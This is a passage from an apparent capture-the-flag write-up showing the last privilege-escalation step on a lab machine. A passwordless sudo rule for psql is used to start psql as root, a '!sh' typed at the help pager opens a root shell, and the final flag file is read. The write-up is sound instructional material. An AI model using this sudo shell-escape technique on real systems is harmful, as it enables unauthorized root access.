    (ALL) NOPASSWD: /usr/local/postgresql/bin/psql
psql is allowed through sudo without a password, and psql can spawn a shell, so that is the route to root.
#start psql via sudo: it runs as root, connects as the database role root, and asks for the password set earlier
postgres@web04:/usr/local/pgsql/data$ sudo /usr/local/postgresql/bin/psql
Password: 123456
Welcome to psql 8.1.0, the PostgreSQL interactive terminal.
Type: \copyright for distribution terms
      \h for help with SQL commands
      \? for help with psql commands
      \g or terminate with semicolon to execute query
      \q to quit
\? sends its help text through the more pager. At a --More-- prompt, ! runs a shell command, so !sh opens a shell that inherits psql's uid, root. (psql's own \! [COMMAND] meta-command, listed in the help below, does the same without the pager.)
root=# \?
General
  \c[onnect] [DBNAME|- [USER]]
                 connect to new database (currently "root")
  \cd [DIR]      change the current working directory
  \copyright     show PostgreSQL usage and distribution terms
  \encoding [ENCODING]
                 show or set client encoding
  \h [NAME]      help on syntax of SQL commands, * for all commands
  \q             quit psql
  \set [NAME [VALUE]]
                 set internal variable, or list all if no parameters
  \timing        toggle timing of commands (currently off)
  \unset NAME    unset (delete) internal variable
  \! [COMMAND]   execute command in shell or start interactive shell

Query Buffer
  \e [FILE]      edit the query buffer (or file) with external editor
  \g [FILE]      send query buffer to server (and results to file or |pipe)
  \p             show the contents of the query buffer
  \r             reset (clear) the query buffer
  \w FILE        write query buffer to file

Input/Output
  \echo [STRING] write string to standard output
  \i FILE        execute commands from file
  \o [FILE]      send all query results to file or |pipe
  \qecho [STRING]
                 write string to query output stream (see \o)

Informational
  \d [NAME]      describe table, index, sequence, or view
  \d{t|i|s|v|S} [PATTERN] (add "+" for more detail)
                 list tables/indexes/sequences/views/system tables
  \da [PATTERN]  list aggregate functions
  \db [PATTERN]  list tablespaces (add "+" for more detail)
  \dc [PATTERN]  list conversions
  \dC            list casts
  \dd [PATTERN]  show comment for object
  \dD [PATTERN]  list domains
  \df [PATTERN]  list functions (add "+" for more detail)
  \dg [PATTERN]  list groups
  \dn [PATTERN]  list schemas (add "+" for more detail)
  \do [NAME]     list operators
  \dl            list large objects, same as \lo_list
  \dp [PATTERN]  list table, view, and sequence access privileges
  \dT [PATTERN]  list data types (add "+" for more detail)
  \du [PATTERN]  list users
  \l             list all databases (add "+" for more detail)
  \z [PATTERN]   list table, view, and sequence access privileges (same as \dp)

Formatting
  \a             toggle between unaligned and aligned output mode
  \C [STRING]    set table title, or unset if none
  \f [STRING]    show or set field separator for unaligned query output
  \H             toggle HTML output mode (currently off)
--More--!sh
# whoami
root
# ls
base pg_hba.conf pg_subtrans PG_VERSION postmaster.opts
global pg_ident.conf pg_tblspc pg_xlog postmaster.pid
pg_clog pg_multixact pg_twophase postgresql.conf
# cd /root
# ls
flag
# cd flag
# ls
flag04.txt
# cat f*
(ASCII-art banner: Hospital)
flag04: flag{c87bef65-080d-4733-92a3-447b2d5d1eb2}
Flag obtained; all four flags collected.
